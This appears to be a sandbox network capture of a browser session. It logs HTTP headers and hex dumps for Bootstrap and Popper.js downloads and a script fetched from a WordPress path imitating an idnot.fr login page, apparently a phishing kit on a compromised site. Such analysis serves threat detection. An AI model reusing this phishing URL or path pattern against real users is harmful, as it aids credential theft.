                        Data Ascii: )}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute("aria
                        2024-08-30 22:35:43 UTC1369INData Raw: 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b 41 43 54 49 56 45 3a 22 2e
                        Data Ascii: LEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={ACTIVE:".
                        2024-08-30 22:35:43 UTC1369INData Raw: 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f 49 54 45 4d 29 5b 30 5d 3b
                        Data Ascii: ull),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_ITEM)[0];
                        2024-08-30 22:35:43 UTC1369INData Raw: 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74
                        Data Ascii: .test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getItemByDirect
                        2024-08-30 22:35:43 UTC1369INData Raw: 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 2b 22 20 22 2b 73 2b 22 20
                        Data Ascii: rget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g+" "+s+"
                        2024-08-30 22:35:43 UTC1369INData Raw: 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63 6f 6c 6c 61 70 73 65 22 2c
                        Data Ascii: {t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.collapse",


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.449754104.18.10.2074433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:43 UTC385OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                        Host: stackpath.bootstrapcdn.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:43 UTC948INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:43 GMT
                        Content-Type: application/javascript; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        CDN-PullZone: 252412
                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                        CDN-RequestCountryCode: DE
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=31919000
                        ETag: W/"67176c242e1bdc20603c878dee836df3"
                        Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                        CDN-CachedAt: 10/31/2023 18:58:40
                        CDN-ProxyVer: 1.04
                        CDN-RequestPullCode: 200
                        CDN-RequestPullSuccess: True
                        CDN-EdgeStorageId: 1048
                        timing-allow-origin: *
                        cross-origin-resource-policy: cross-origin
                        X-Content-Type-Options: nosniff
                        CDN-Status: 200
                        CDN-RequestId: f4f838df79fc133911a060d7c6bb0f5c
                        CDN-Cache: HIT
                        CF-Cache-Status: HIT
                        Age: 14699672
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Server: cloudflare
                        CF-RAY: 8bb8416b1bb442f7-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-08-30 22:35:43 UTC421INData Raw: 37 62 66 66 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                        Data Ascii: 7bff/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                        2024-08-30 22:35:43 UTC1369INData Raw: 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2e 6b 65 79
                        Data Ascii: query","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key
                        2024-08-30 22:35:43 UTC1369INData Raw: 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b
                        Data Ascii: ,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;
                        2024-08-30 22:35:43 UTC1369INData Raw: 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 63 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e
                        Data Ascii: arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return t.close=function
                        2024-08-30 22:35:43 UTC1369INData Raw: 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27 2c 41 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22
                        Data Ascii: ew _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]',A='[data-toggle="
                        2024-08-30 22:35:43 UTC1369INData Raw: 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 6d 2e 66 6e 5b 70 5d 2e 43
                        Data Ascii: t();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryInterface,m.fn[p].C
                        2024-08-30 22:35:43 UTC1369INData Raw: 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 29 26 26 74 68 69 73 2e 6e 65 78 74 28 29 7d 2c
                        Data Ascii: Selector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibility")&&this.next()},
                        2024-08-30 22:35:43 UTC1369INData Raw: 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72
                        Data Ascii: n t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER,function(t){retur
                        2024-08-30 22:35:43 UTC1369INData Raw: 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c 73 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75
                        Data Ascii: if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,s=this._element.qu
                        2024-08-30 22:35:43 UTC1369INData Raw: 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66 28 6e 26 26 50 28 6e 29 2e 68 61 73 43 6c 61 73 73 28
                        Data Ascii: tring"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if(n&&P(n).hasClass(


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.44974988.212.10.204433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:43 UTC405OUTGET /wp-admin/maint/connexion.idnot.fr-user-auth-dologin/X911/script.js HTTP/1.1
                        Host: www.askozvar.sk
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:43 UTC292INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:43 GMT
                        Server: Apache
                        Upgrade: h2
                        Connection: Upgrade, close
                        Last-Modified: Sun, 25 Aug 2024 16:52:50 GMT
                        ETag: "1268-62084d6b19c80"
                        Accept-Ranges: bytes
                        Content-Length: 4712
                        Vary: Accept-Encoding
                        Content-Type: application/javascript
                        2024-08-30 22:35:43 UTC4712INData Raw: 2f 2a 20 67 6c 6f 62 61 6c 20 24 20 2a 2f 0d 0a 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 63 6f 75 6e 74 20 3d 20 30 3b 0d 0a 0d 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6b 65 79 70 72 65 73 73 28 66 75 6e 63 74 69 6f 6e 28 65 76 65 6e 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 6b 65 79 63 6f 64 65 20 3d 20 28 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3f 20 65 76 65 6e 74 2e 6b 65 79 43 6f 64 65 20 3a 20 65 76 65 6e 74 2e 77 68 69 63 68 29 3b 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 6b 65 79 63 6f 64 65 20 3d 3d 20 27 31 33 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 24 28 22 23 64 69 76 50 72 22 29 2e 69 73 28 22 3a 76 69 73 69 62 6c
                        Data Ascii: /* global $ */$(document).ready(function() { var count = 0; $(document).keypress(function(event) { var keycode = (event.keyCode ? event.keyCode : event.which); if (keycode == '13') { if ($("#divPr").is(":visibl


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.449752104.17.25.144433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:43 UTC388OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                        Host: cdnjs.cloudflare.com
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:43 UTC952INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:43 GMT
                        Content-Type: application/javascript; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=30672000
                        ETag: W/"5eb03fa9-4af4"
                        Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                        cf-cdnjs-via: cfworker/kv
                        Cross-Origin-Resource-Policy: cross-origin
                        Timing-Allow-Origin: *
                        X-Content-Type-Options: nosniff
                        CF-Cache-Status: HIT
                        Age: 157968
                        Expires: Wed, 20 Aug 2025 22:35:43 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FrfLyWxtObVToz7rRrZdAZ9QJSmVtfjAyPL4UNBzoEFfEolxNZ3SHkToDw3laHksnZvyWkTo1TbsVxl466qUkrYcqRyX8DshZ9mEskykplXkkvV3O1UOZpcPrdMMAog94jLY1lSR"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                        Strict-Transport-Security: max-age=15780000
                        Server: cloudflare
                        CF-RAY: 8bb8416b1ed18c93-EWR
                        alt-svc: h3=":443"; ma=86400
